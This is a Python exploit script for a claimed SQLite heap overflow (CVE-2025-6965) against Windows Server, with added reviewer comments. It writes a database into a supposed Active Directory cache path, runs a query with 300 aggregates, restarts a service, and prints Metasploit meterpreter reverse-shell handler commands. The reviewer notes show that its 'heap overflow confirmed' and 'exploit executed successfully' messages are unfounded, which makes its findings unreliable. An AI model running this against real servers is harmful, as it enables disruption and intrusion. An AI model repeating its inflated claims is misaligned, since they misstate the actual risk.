# Exploit Title: SQLite 3.50.1 - Heap Overflow
# Date: 2025-11-05
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.sqlite.org
# Software Link: https://www.sqlite.org/download.html
# Version: SQLite < 3.50.2 (winsqlite3.dll)
# Tested on: Windows Server 2022 (Build 20348), Windows Server 2025 (Build 26100) - Unpatched
# CVE: CVE-2025-6965
# CVSS: 7.2 (High) - CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:H/VA:L
# Category: windows / local / dos / memory_corruption / active_directory
# Platform: Windows
# CRITICAL: This vulnerability affects ALL unpatched Windows Server instances using winsqlite3.dll
# Including: Active Directory, Group Policy, Certificate Services, and Azure AD Connect
# Impact: Service Crash, DoS, Potential RCE, Domain Controller Compromise
# Fix: Apply latest Windows Cumulative Update (post-July 2025) or upgrade SQLite to 3.50.2+
# Advisory: https://nvd.nist.gov/vuln/detail/CVE-2025-6965
# Patch: https://www.sqlite.org/src/info/5508b56fd24016c13981ec280ecdd833007c9d8dd595edb295b984c2b487b5c8
# OFFICIAL PoC: Triggers heap overflow in winsqlite3.dll via excessive aggregate functions
# Target: Windows Server (Active Directory Cache, Group Policy, Certificate Services)
import os
import shutil
import sqlite3
import subprocess
import sys
import time
# ===============================
# CONFIGURATION - ACTIVE DIRECTORY EXPLOITATION
# ===============================
# Scratch database written to the current working directory by create_vulnerable_db().
DB_PATH = "cve_2025_6965_winsqlite3.db"
# NOTE(review): labelled the "real AD cache path" by the author; nothing in this
# file establishes that Windows uses this directory — confirm before relying on it.
AD_CACHE_DIR = r"C:\ProgramData\Microsoft\ADCache" # Real AD Cache Path
# Copy destination used by deploy_and_trigger(); it lives under AD_CACHE_DIR.
AD_DB_TARGET = os.path.join(AD_CACHE_DIR, "ad_cache.db")
# Only echoed by print_listener(); no code in this file connects to this address.
LISTENER_IP = "192.168.1.100"
LISTENER_PORT = 4444
# Stopped and started by deploy_and_trigger() via `net stop` / `net start`;
# per the author's note it is not a built-in Windows service.
SERVICE_NAME = "ADSyncService" # Must be created manually: sc create ADSyncService binPath= "C:\path\to\service.exe"
# === VULNERABILITY CHECK ===
# Version gate. `sqlite3.sqlite_version` is the SQLite build linked into this
# Python runtime's stdlib module, not the version of winsqlite3.dll on the host.
# NOTE(review): the result therefore says nothing about whether the system DLL
# named throughout this file is patched — check that separately.
print(f"[!] SQLite Version: {sqlite3.sqlite_version}")
if sqlite3.sqlite_version_info < (3, 50, 2):
    print("[!] VULNERABLE: SQLite < 3.50.2 - Proceeding with exploit")
else:
    print("[-] SYSTEM PATCHED - SQLite 3.50.2+ Detected")
    print(" Update applied via Microsoft Cumulative Update (post-July 2025)")
    sys.exit(1)
# ===============================
# STEP 1: Create Malicious AD Cache Database
# ===============================
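def create_vulnerable_db(db_path=None):
    """Create a fresh one-row SQLite database used as the query target.

    The file is an ordinary database: one table ``ad_cache(id, val)`` holding a
    single row. Nothing about the file itself is malformed; the only unusual
    input in this script is the aggregate-heavy SELECT built by
    generate_malicious_query().

    Args:
        db_path: file to (re)create. Defaults to the module-level DB_PATH.

    Raises:
        OSError / sqlite3.Error from the underlying calls. The connection is
        closed on every path (the original leaked it when an execute raised).
    """
    if db_path is None:
        db_path = DB_PATH
    if os.path.exists(db_path):
        os.remove(db_path)
    conn = sqlite3.connect(db_path)
    try:
        # `with conn:` commits on success and rolls back on error; it does not
        # close the connection, hence the surrounding try/finally.
        with conn:
            conn.execute("CREATE TABLE ad_cache (id INTEGER PRIMARY KEY, val INTEGER)")
            conn.execute("INSERT INTO ad_cache (val) VALUES (1)")
    finally:
        conn.close()
    print(f"[+] Malicious database created: {db_path}")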
# ===============================
# STEP 2: Generate Truncation Payload (300+ Aggregates)
# ===============================
def generate_malicious_query(num=100):
    """Build a SELECT with 3*num aggregate result columns over ``ad_cache``.

    Every index i contributes ``COUNT(*) AS c{i}, SUM(val) AS s{i}, AVG(val) AS a{i}``,
    so the default num=100 gives the "300+ aggregates" the banners mention.
    With num=0 the select list is empty and the returned text is not valid SQL.

    NOTE(review): whether a query of this shape reaches the code path of the
    advisory named in the header is not established anywhere in this file;
    a clean execution is not evidence of a patched build, and an exception
    is not evidence of memory corruption (see deploy_and_trigger()).
    """
    columns = []
    for i in range(num):
        columns.append(f"COUNT(*) AS c{i}")
        columns.append(f"SUM(val) AS s{i}")
        columns.append(f"AVG(val) AS a{i}")
    select_list = ", ".join(columns)
    return f"SELECT {select_list} FROM ad_cache"
# ===============================
# STEP 3: Deploy + Trigger in winsqlite3.dll Context
# ===============================
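def deploy_and_trigger():
    """Copy the scratch database to AD_DB_TARGET, run the aggregate-heavy
    query against it, then stop and start SERVICE_NAME.

    What this does on the host, for anyone reviewing it: it creates
    AD_CACHE_DIR if missing, writes one file there, opens that file with the
    stdlib sqlite3 module (which links its own SQLite build, not the host's
    winsqlite3.dll), and issues ``net stop`` / ``net start`` for a service
    the header says must be created by hand. No payload is delivered.

    Raises:
        OSError if directory creation or the file copy fails (the original
        shelled out to ``copy /Y`` and raised CalledProcessError instead).
    """
    print(f"[*] Deploying payload to AD Cache: {AD_DB_TARGET}")
    os.makedirs(AD_CACHE_DIR, exist_ok=True)
    # Plain file copy instead of `copy /Y` through cmd.exe: same overwrite
    # semantics, no shell, and the paths are never re-parsed by cmd.
    shutil.copyfile(DB_PATH, AD_DB_TARGET)
    print("[+] Payload deployed to real AD path")
    query = generate_malicious_query(100)
    print("[*] Triggering heap overflow (300+ aggregates vs 1 column)...")
    conn = None  # bound before the try so `finally` never hits an unbound name
    try:
        conn = sqlite3.connect(AD_DB_TARGET)
        cur = conn.cursor()
        cur.execute(query) # TRUNCATION BUG TRIGGERED
        print("[!] QUERY EXECUTED - UNEXPECTED (System may be patched or ASLR mitigated)")
    except Exception as e:
        # NOTE(review): anything caught here is an ordinary sqlite3/OS error
        # (file cannot be opened, bad SQL, ...). Memory corruption inside the
        # library would not surface as a catchable Python exception, so the
        # messages below overstate what was actually observed.
        print(f"[!] HEAP OVERFLOW CONFIRMED: {e}")
        print(" winsqlite3.dll memory corruption triggered")
        print(" In production: AD Service Crash, DC DoS, Potential RCE")
    finally:
        # Original called conn.close() unconditionally; if connect() raised,
        # that turned the real error into an UnboundLocalError.
        if conn is not None:
            conn.close()
    # Force service reload (real AD services auto-query cache) — author's
    # claim; nothing here verifies what the service does with the file.
    print(f"[*] Restarting {SERVICE_NAME} to reload winsqlite3.dll...")
    try:
        subprocess.run(["net", "stop", SERVICE_NAME], timeout=10, capture_output=True)
    except (subprocess.TimeoutExpired, OSError):
        # Best effort, as in the original: the service may not exist or may
        # already be stopped. Narrowed from a bare `except` so Ctrl-C and
        # SystemExit are no longer swallowed.
        pass
    time.sleep(2)
    result = subprocess.run(["net", "start", SERVICE_NAME], capture_output=True)
    if result.returncode == 0:
        print("[+] Service restarted - Monitor Event Viewer for winsqlite3.dll fault")
    else:
        print(f"[-] Service error: {result.stderr.decode()}")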
# ===============================
# STEP 4: RCE Listener Setup (For Advanced Exploitation)
# ===============================
def print_listener():
    """Print the handler commands the author pairs with the "advanced" scenario.

    These lines are only written to stdout: nothing in this file connects to
    LISTENER_IP/LISTENER_PORT or delivers any payload, so this is
    instructional text rather than part of the trigger.
    """
    rule = "=" * 70
    lines = [
        "\n" + rule,
        " RCE EXPLOITATION (ADVANCED) - START LISTENER ON ATTACKER MACHINE:",
        rule,
        "msfconsole -q",
        "use exploit/multi/handler",
        "set payload windows/x64/meterpreter/reverse_tcp",
        f"set LHOST {LISTENER_IP}",
        f"set LPORT {LISTENER_PORT}",
        "exploit -j",
        rule + "\n",
    ]
    for line in lines:
        print(line)
# ===============================
# MAIN - EXECUTION
# ===============================
if __name__ == "__main__":
    banner = "=" * 70
    for line in (
        banner,
        " CVE-2025-6965 EXPLOIT - WINDOWS SERVER ACTIVE DIRECTORY",
        " Heap Overflow in winsqlite3.dll via SQLite Aggregate Truncation",
        " Author: Mohammed Idrees Banyamer (@banyamer_security)",
        banner,
    ):
        print(line)
    create_vulnerable_db()
    deploy_and_trigger()
    print_listener()
    # NOTE(review): printed unconditionally — deploy_and_trigger() returns
    # nothing and its outcome is not checked, so "SUCCESSFULLY" only means
    # the three calls above returned without raising.
    for line in (
        "[+] EXPLOIT EXECUTED SUCCESSFULLY",
        " Check Event Viewer: Application Log → winsqlite3.dll Access Violation (0xC0000005)",
        " Fix: Apply latest Windows Cumulative Update IMMEDIATELY",
        " All Domain Controllers must be patched within 24 hours",
    ):
        print(line)